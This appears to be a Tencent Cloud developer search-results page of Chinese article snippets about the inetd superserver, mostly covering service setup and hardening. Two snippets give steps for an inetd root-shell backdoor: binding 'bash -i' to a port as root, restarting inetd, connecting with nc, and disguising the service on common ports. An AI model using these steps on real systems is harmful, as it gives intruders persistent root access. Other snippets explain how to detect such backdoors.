- 综合排序
- 最热优先
- 最新优先
- 来自专栏渗透测试教程
linux-wrapper跟inetd服务后门
/sbin; inetd服务后门 inetd是一个监听外部网络请求(就是一个socket)的系统守护进程,默认情况下为13端口。 当inetd接收到一个外部请求后,它会根据这个请求到自己的配置文件中去找到实际处理它的程序,然后再把接收到的这个socket交给那个程序去处理。 所以,如果我们已经在目标系统的inetd配置文件中配置好,那么来自外部的某个socket是要执行一个可交互的shell,就获取了一个后门 部署inetd服务后门 #修改/etc/inetd.conf $ daytime stream tcp nowait root /bin/bash bash -i #开启inetd $inetd #nc连接 nc -vv 192.168.2.11 13 #可以配合 /bash bash -i #可以修改成一些常见的端口,以实现隐藏 检测:查看配置文件即可 cat /etc/inetd.conf 在这里插入图片描述 ?
1.6K10发布于 2021-03-23 - 来自专栏转载gongluck的CSDN博客
第13章 守护进程和inetd超级服务器
#include <syslog.h> void openlog(const char* ident, int options, int facility); void syslog(int pri
1.5K50发布于 2018-03-09 - 来自专栏全栈程序员必看
busybox配置telnetd
busybox配置telnetd的问题 进入busybox源码文件夹,选择telnet,telnetd.后确保在ramdisk的sbin文件夹下存在inetd和in.telnetd或telned。 在ramdisk中的mnt/etc文件夹中,确保存在文件fstab,service,inetd.conf,passwd文件确保fstab文件里存在none /dev/pts devpts mode=0622 0 0这一行确保services文件里存在 telnet 23/tcp 这一行确保inetd.conf中存在 telnet stream tcp nowait root /sbin/in.telnetd /pts file system for Unix98 PTYs 退出后make zImage就可以在ramdisk的启动文件mnt/etc/init.d/rcS中,在mount –a的后面下一行添�inetd ,使系统启动的时候就载入telnetd服新建inetd.conf文件,内容例如以下: # telnetstream tcp nowait root /usr/sbin/telnetd 执行inetd inetd.conf
1.5K30编辑于 2021-12-23 - 来自专栏开源部署
Ubuntu下搭建tftp服务
1.安装客户端tftp、服务器端tftpd、openbsd-inetd: sudo apt-get install tftp tftpd openbsd-inetd 2.配置: sudo vim /etc /inetd.conf 在inetd.conf文件中添加如下一行内容: tftp dgram udp wait nobody /usr/sbin/tcpd /usr/sbin/in.tftpd ~/work /tftpboot 3.重新启动配置文件: sudo /etc/init.d/openbsd-inetd restart 4.测试: 在终端输入tftp 127.0.0.1 如tftpboot目录下有文件
3.4K20编辑于 2022-06-30 - 来自专栏建站知识
FreeBSD 配置FTP服务
启动 FTP 服务器 我们有二种方式启动 ftpd,一种是使用 standalone daemon,另一种是使用 inetd。 不过,使用 inetd 的方式缺点是每次有联机要求时,inetd 的 daemon 必须依联机的种类去执行相对映的指令,所以速度比较慢。 使用 inetd 我们先来介绍如何使用 inetd 的方式启动 FTP 服务器。 tcp6 nowait root /usr/libexec/ftpd ftpd -l 接下来,我们必须使用下列指令重跑 inetd: # kill -1 `cat /var/run/inetd.pid ` (该命令基于已经运行了inetd)如果没有运行ftp服务器,则Alt+F2里输入: inetd 现在您就可以开始使用 FreeBSD 的 FTP 服务。
2.2K20发布于 2021-07-21 - 来自专栏蓝天
Ubuntu系统微调
服务的访问限制 对于 Internet 超级服务器,inetd 会在系统启动时通过 /etc/rc2.d/S20inetd(for RUNLEVEL=2)加载,S20inetd 是一个指向 /etc/init.d /inetd 的符号链接。 当某个服务请求到达,系统会查询 /etc/protocols 和 /etc/services 中的数据库,确定该请求所指定的相关协议和服务,接着 inetd 会在 /etc/inetd.conf 数据库中查找普通 有时,inetd 并不直接打开请求的服务,而是在 /etc/inetd.conf 中将该服务名作为的参数,打开 tcpd TCP/IP 守护进程包装程序。 更多信息参阅 inetd(8)、inetd.conf(5)、protocols(5)、services(5)、tcpd(8)、hosts_access(5) 和 hosts_options(5)。
1.1K30发布于 2018-08-07 - 来自专栏全栈程序员必看
talnet服务器搭建
刚安装的ubuntu12.04还没有telnet功能,需要配置一下 我主要是想让ubuntu12.04开启telnet服务做服务器 安装openbsd-inetd: #sudo apt-get install openbsd-inetd 安装telnetd: #sudo apt-get install telnetd 在etc/inetd.conf文件中可以看到这一行内容 telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd 如果没有这一行内容,就手动加上 重启openbsd-inetd #/etc/init.d/openbsd-inetd restart 查看telnet运行状态 #netstat -a | grep telnet 输出: tcp 0 0
1.1K10编辑于 2022-07-04 - 来自专栏北京马哥教育
Linux如何判断自己的服务器是否被入侵
顺便再检查一下系统里有没有空口令帐户: 2、查看一下进程,看看有没有奇怪的进程 重点查看进程: ps –aef | grep inetd inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前 ,如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程,着重看inetd –s后面的内容。 在正常情况下,LINUX系统中的inetd服务后面是没有-s参数的,当然也没有用inetd去启动某个文件;而solaris系统中也仅仅是inetd –s,同样没有用inetd去启动某个特定的文件;如果你使用 ps命令看到inetd启动了某个文件,而你自己又没有用inetd启动这个文件,那就说明已经有人入侵了你的系统,并且以root权限起了一个简单的后门。 3、检查系统守护进程 检查/etc/inetd.conf文件,输入:cat /etc/inetd.conf | grep –v “^#”,输出的信息就是你这台机器所开启的远程服务。
4.1K70发布于 2018-05-04 - 来自专栏大猪的笔记
使用hyper backup与rsync将数据备份到unraid
grep ^rsync /etc/inetd.conf > /dev/null ; then cat <<-EOF >> /etc/inetd.conf rsync stream tcp nowait root /usr/sbin/tcpd /usr/bin/rsync --daemon EOF read PID < /var/run/inetd.pid kill -1 ${PID
4.5K30发布于 2021-11-22 - 来自专栏北京马哥教育
Linux如何判断自己的服务器是否被入侵
顺便再检查一下系统里有没有空口令帐户: 2、查看一下进程,看看有没有奇怪的进程 重点查看进程: ps –aef | grep inetd inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前 ,如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程,着重看inetd –s后面的内容。 在正常情况下,LINUX系统中的inetd服务后面是没有-s参数的,当然也没有用inetd去启动某个文件;而solaris系统中也仅仅是inetd –s,同样没有用inetd去启动某个特定的文件;如果你使用 ps命令看到inetd启动了某个文件,而你自己又没有用inetd启动这个文件,那就说明已经有人入侵了你的系统,并且以root权限起了一个简单的后门。 3、检查系统守护进程 检查/etc/inetd.conf文件,输入:cat /etc/inetd.conf | grep –v “^#”,输出的信息就是你这台机器所开启的远程服务。
3.6K41发布于 2019-07-15 - 来自专栏开源部署
HPUX安装Nagios监控插件(NRPE)难点解析
oracle插件的权限) 三、HPUX上安装NRPE swinstall -s /tmp/NRPE-2.12.depot.gz swlist -l product | grep NRPE 四、将NRPE配置为inetd 管理进程 /opt/nrpe/bin/configure.sh 会在/etc/services与/etc/inetd.conf文件中添加nrpe相关的配置项 五、修改NRPE主配置文件 vi /opt/ ,nagios_server_ip 2、command[check_users]=/opt/nrpe/libexec/check_users -w 5 -c 10 (添加监控命令) 六、启动NRPE inetd -k && inetd (作为inetd后台服务启动) 七、测试NRPE /usr/local/nagios/libexec/check_nrpe -H xxxxxx NRPE v2.12 返回上信息测试成功
80300编辑于 2022-06-30 - 来自专栏linux教程
如何增强Linux和Unix服务器的安全性
# /usr/sbin/exportfs -a 2.inetd设置 首先要确认/etc/inetd.conf的所有者是root,且文件权限设置为600。设置完成后,可以使用"stat"命令进行检查。 # chmod 600 /etc/inetd.conf 然后,编辑/etc/inetd.conf禁止以下服务。 为了使改变生效,运行如下命令: #killall -hup inetd 默认情况下,多数linux系统允许所有的请求,而用tcp_wrappers增强系统安全性是举手之劳,您可以修改/etc /hosts.deny 如果您希望远程登录用户看不到系统和版本信息,可以通过一下操作改变/etc/inetd.conf文件: telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
1.4K20编辑于 2023-04-26 - 来自专栏北京马哥教育
预防高逼格Linux黑客招数,不学你就后悔吧!
2.取消不必要的服务 早期的Unix版本中,每一个不同的网络服务都有一个服务程序在后台运行,后来的版本用统一的/etc/inetd服务器程序担此重任。 Inetd是Internetdaemon的缩写,它同时监视多个网络端口,一旦接收到外界传来的连接信息,就执行相应的TCP或UDP网络服务。 由于受inetd的统一指挥,因此Linux中的大部分TCP或UDP服务都是在/etc/inetd.conf文件中设定。 所以取消不必要服务的第一步就是检查/etc/inetd.conf文件,在不要的服务前加上“#”号。 Inetd除了利用/etc/inetd.conf设置系统服务项之外,还利用/etc/services文件查找各项服务所使用的端口。因此,用户必须仔细检查该文件中各端口的设定,以免有安全上的漏洞。
1.1K70发布于 2018-05-02 - 来自专栏韦东山嵌入式
【教程】从零制作文件系统到jz2440,使其支持telnet , ftp 和tftp
9.添加ftp功能 制作文件系统时新建/etc/inetd.conf cd /work/busybox-1.21.0/rootfs/etc $touch inetd.conf $chmod 777 inetd.conf $vi inetd.conf,内容如下 21 stream tcp nowait root ftpd ftpd -w / 开发板开启ftpd $inetd 就可以用filezilla $vi inetd.conf,追加一行: 69 dgram udp nowait root /usr/sbin/tftpd tftpd -l 测试tftp window打开tftpd32,选择
2.7K30发布于 2020-09-30 - 来自专栏linux教程
如何合理设置SCO Unix系统的安全级别
合理配置/etc/inetd.conf文件 Unix系统启动时运行inetd进程,对大部分网络连接进行监听,并且根据不同的申请启动相应进程。 其中ftp、telnet、rcmd、rlogin和finger等都由inetd来启动对应的服务进程。因此,从系统安全角度出发,我们应该合理地设置/etc/inetd.conf文件,将不必要的服务关闭。 #ps-ef │ grep inetd │ grep -v grep #kill -HUP 〈 inetd-PID 〉 合理设置/etc/ftpusers文件 在/etc/ftpuser文件里列出了可用
69420编辑于 2023-04-25 - 来自专栏技巅
Glusterfs之nfs模块源码分析(上)之nfs原理和协议
(4)inetd Internet services服务进程 当系统启动时,rc.local会启动inetd读取inetd.conf配置文件,读取网络上所有服务器的地址,链接启动inetd.conf中所有的服务器 当客户机请求服务时,inetd就会启动相关的服务进程,如user使用telnet时,inetd启动telnetd配合user telnet的需求,其余像ftp、finger、rlogin等应用程序,inetd 一般RPC服务器是被inet启动的,所以portmap必须在inetd之前启动,否则无法进行RPC调用。
2.5K60发布于 2018-05-25 - 来自专栏《How Linux Work》
【Linux】《how linux work》第十章 网络应用和服务(1)
10.4 The inetd and xinetd Daemons(inetd 和 xinetd 守护进程) Implementing standalone servers for every service 启动 inetd 后,它会读取其配置文件,然后监听该文件中定义的网络端口。随着新的网络连接到来,inetd 会将一个新启动的进程附加到连接上。 /etc/ inetd.conf configuration file: 尽管 inetd 不再常用,但其配置显示了设置服务所需的一切。 事实证明,sshd 也可以由 inetd 而不是作为独立服务器调用,如下所示在这个 /etc/ inetd.conf 配置文件中: ident stream tcp nowait root /usr/ inetd 应该连接到的程序。 o 参数。可执行文件的参数。第一个参数应该是程序的名称。
38810编辑于 2024-05-06 - 来自专栏全栈程序员必看
aix 关闭端口
#rmsock f1000200019ce398 tcpcb The socket 0x19ce008 is being held by proccess 185006 (inetd). 命令报告该端口正在被inetd进程使用,PID为185006。 注意:rmsock命令需要root权限执行。
3.3K20编辑于 2022-09-09 - 来自专栏编程
Linux后门整理合集
远程后门 利用方法 我们使用vi来修改 /etc/inetd.conf 文件 原文件: #chargen dgram udp wait root internal #discard stream tcp root internal #discard dgram udp wait root internal daytime stream tcp nowait root /bin/bash bash -i 开启inetd : dawg:~# inetd 如果要强制重启inetd: dawg:~# ps -ef grep inetdroot 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetdroot 13769 13643 0 17:51 pts/1 00:00:00 grep inetd dawg:~# kill -HUP 362 现在我们就可以用 nc来爆菊了: 可以修改/etc/services文件,加入以下的东西: woot 6666/tcp #evil backdoor service 然后修改/etc/inetd.conf : woot
2.5K80发布于 2018-01-04 - 来自专栏全栈程序员必看
Petalinux2019.1详细安装[通俗易懂]
均在管理员模式下安装 额外安装三个库 sudo apt-get install tftpd sudo apt-get install tftp sudo apt-get install openbsd-inetd 在虚拟机中 sudo gedit /etc/inetd.conf 增加 tftp dgram udp wait nobody /usr/sbin/tcpd /usr/sbin/in.tftpd /tftproot 保存退出 sudo mkdir /tftproot sudo chmod 777 /tftproot /ect/init.d/openbsd-inetd restart netstat
1.6K20编辑于 2022-10-01
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号